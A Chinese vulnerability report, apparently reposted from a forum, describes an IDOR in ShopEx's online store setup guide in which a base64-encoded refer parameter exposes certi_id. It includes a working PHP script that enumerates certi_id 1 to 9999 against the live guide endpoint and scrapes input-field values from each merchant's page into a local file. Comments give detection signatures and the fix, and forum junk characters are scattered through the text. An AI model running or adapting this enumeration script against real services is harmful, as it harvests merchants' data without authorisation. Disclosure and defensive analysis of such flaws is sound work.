|
|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面
/ t/ P# v; O1 q( ]5 ?8 [* `5 I3 t* V' i% ?$ [7 C4 y
" o5 j1 |2 j: k n2 g5 h4 Z- j# m: w+ u
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
2 _5 L5 p. `6 I
6 v! _6 m+ y* R! ^0 C) A* [+ t) }8 a4 i- z7 K, D+ R
refer 经 base64 解码为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
! e- ?' h8 d% P# f% A7 Y4 Z5 y) X- t
$ q) t7 t! z! U% }
% ~$ V2 ]% z% [1 Y/ a; G5 V% z! Y
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
4 C5 w) N" d, O, \% E9 x/ }
' L8 S1 E; A" h {3 E
) ?( v/ e7 w; n0 g5 d
9 S6 k6 F) R- I5 f6 d<?php
// Driver: calls ShowshopExD() once per certi_id, 1..9999, back to back with
// no pause or error handling. From the defending side, a burst of sequential
// step2.php requests whose refer differs only in certi_id is the signature to
// alert on, and per-IP rate limiting on that endpoint caps the blast radius.
- [8 E! v; U/ Y0 L) N
* |0 X8 ~, o( x# y, K for ($i=1; $i < 10000; $i++) { // enumerate certi_id 1..9999
7 b% t% x1 D# g; w2 A1 q k& V4 k
ShowshopExD($i);* g: |1 V! w. ^+ N( v. H1 `
: w1 P5 v1 q6 l! [ }# q. z# ^: s2 T2 A
) y2 H+ X) u0 y, O: H3 b5 f9 q( r
/**
 * Fetches the guide step2.php page for one certi_id and scrapes the
 * name/value pairs of every <input type="text"> in the response.
 *
 * The request carries a client-built `refer` query parameter: base64 of a
 * JSON object holding certi_id and a callback_url. Nothing in that blob is a
 * signature or a session binding, so the endpoint is presumably using the
 * certi_id exactly as the client supplied it (the IDOR this write-up reports).
 * Server-side fix: do not read certi_id from `refer` at all — take it from the
 * authenticated session — or HMAC-sign the blob and verify it with
 * hash_equals() before trusting it. Repeated step2.php hits whose refer
 * differs only in certi_id are the detection signature; per-IP rate limiting
 * on the endpoint blunts the enumeration.
 *
 * @param int|string $cid  certi_id to query; passed through intval()
 * @return void  results are echoed and appended to c:/shopEx.txt
 */
function ShowshopExD($cid) {
9 G+ @. u1 `3 @! L1 f/ o' s$ u1 d2 ?# ^& r
$url='http://guide.ecos.shopex.cn/step2.php';- F" b, [3 H9 G( T7 c
2 N, o! j' e1 a5 h" n. i& g; X
// Plain base64 of plain JSON — no key is involved, so the server has no way
// to distinguish a rewritten certi_id from a legitimate one.
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
" @& L0 B2 z5 h. h5 B; c7 B
5 v0 S5 @' ]9 O* |& O; V1 E \ $url = $url.'?refer='.$refer;
8 h# M0 Q% Z# v, r( f
! w# {1 l! M6 u; L5 g $ch = curl_init($url);
4 |, d$ m Z! _9 r% S% p: D# _
* _# t, Z `7 n4 s: }* N curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
$ e- |* M5 w& T' R: ?* ]% p/ z6 Z/ @+ M' Z* A' G
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
& k) x4 k1 f2 C! m& _2 J/ |* f T4 W5 b# a0 X
// curl_exec() returns false on a transport error; that case is not checked,
// so a failed fetch falls through to the string handling below.
$result = curl_exec($ch);2 T8 I _" P0 c6 F
3 i) r7 d$ g0 H" `# J$ c* o2 t
// Re-encodes the body UTF-8 -> GB2312 before matching. The regexes below are
// ASCII-only and run without the u modifier, so this mainly changes the bytes
// that get echoed and written to the file.
$result = mb_convert_encoding($result, "gb2312", "UTF-8");7 c, P3 E2 L- |/ y. @- M
# a! y% _9 X9 @7 I1 E
// "The page echoed our refer" is taken to mean "this certi_id exists".
// Truthy strpos(): a hit at offset 0 would be skipped; `!== false` is the
// intended test.
if(strpos($result,$refer))* u4 T; x9 e: P1 N ?. \% C: I
: V' K' K3 g: D5 t8 p {0 K: t; k( O- B+ t% J
) g- n* e5 u9 U $fp = fopen("c:/shopEx.txt",'ab'); // append to a local file; fopen() result is not checked
& w6 X; c3 M2 ~
// Attribute text of every self-closing <input type="text" .../>.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);2 i$ V5 `% S0 z" T
9 f" K8 y6 ~2 F! ~" Z" t
foreach ($value[1] as $key) {3 B) Q5 V: p( V' v7 @5 [ c
# s s+ ^& l+ v9 T6 `# V/ F preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);- C) K$ c! x) e4 q. y
( X) d- S8 q( ?. {* B$ l5 O$ m
// Only the first name/value match is used; an input without a value
// attribute leaves $res[3] empty, so $res[3][0] is undefined there.
echo $res[1][0].':'.$res[3][0]."\r\n";
6 l1 x0 b% u* X6 M+ Z8 ~/ v6 h( ~1 X3 H9 k1 l$ e# h8 J) b$ S
$col =$res[1][0].':'.$res[3][0]."\r\n";
w4 l8 C3 [: a3 G2 `8 ^; Q, o! Y5 N# ?0 B0 p9 K
fwrite($fp, $col, strlen($col));
0 O6 s- ^; \9 b, r0 n a( G6 d$ \$ V$ Y% U
}- o5 j6 w5 E7 W! k! \$ p; X
# J, v. W7 N; l5 ]
// Visual separator between certi_id records in the console output.
echo '--------------------------------'."\r\n";2 B# }+ {( O: m* p Y+ P
0 c) g" X, g1 M. Y fclose($fp); 1 v# P4 J$ X7 W5 h& W0 `' t2 J
# q$ ], z+ C2 |! ]( y9 p }8 h2 V. a% w2 e- Y7 b4 F
// Push the echoed lines out before the next request.
2 M, N, r' G% d( N9 u' e flush();# M# n4 [6 v3 Q: o3 }1 _- f
- U! _, c: \, H4 N5 x9 a8 P! T
curl_close($ch);/ N. n a" G# i1 P" I0 W& m! B
: _& }1 }5 c$ J1 s" A, U }6 `7 V7 {7 J% F4 H6 y
% ~' k/ w g8 K) i2 i
?>3 Y3 k9 T9 l6 V6 Z& U, B# {$ f" Y
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
修复建议：refer 参数应改用其他加密方式（目前仅为 base64 编码，certi_id 可被直接篡改）
! `; J$ {) S* z6 |6 `, U |
|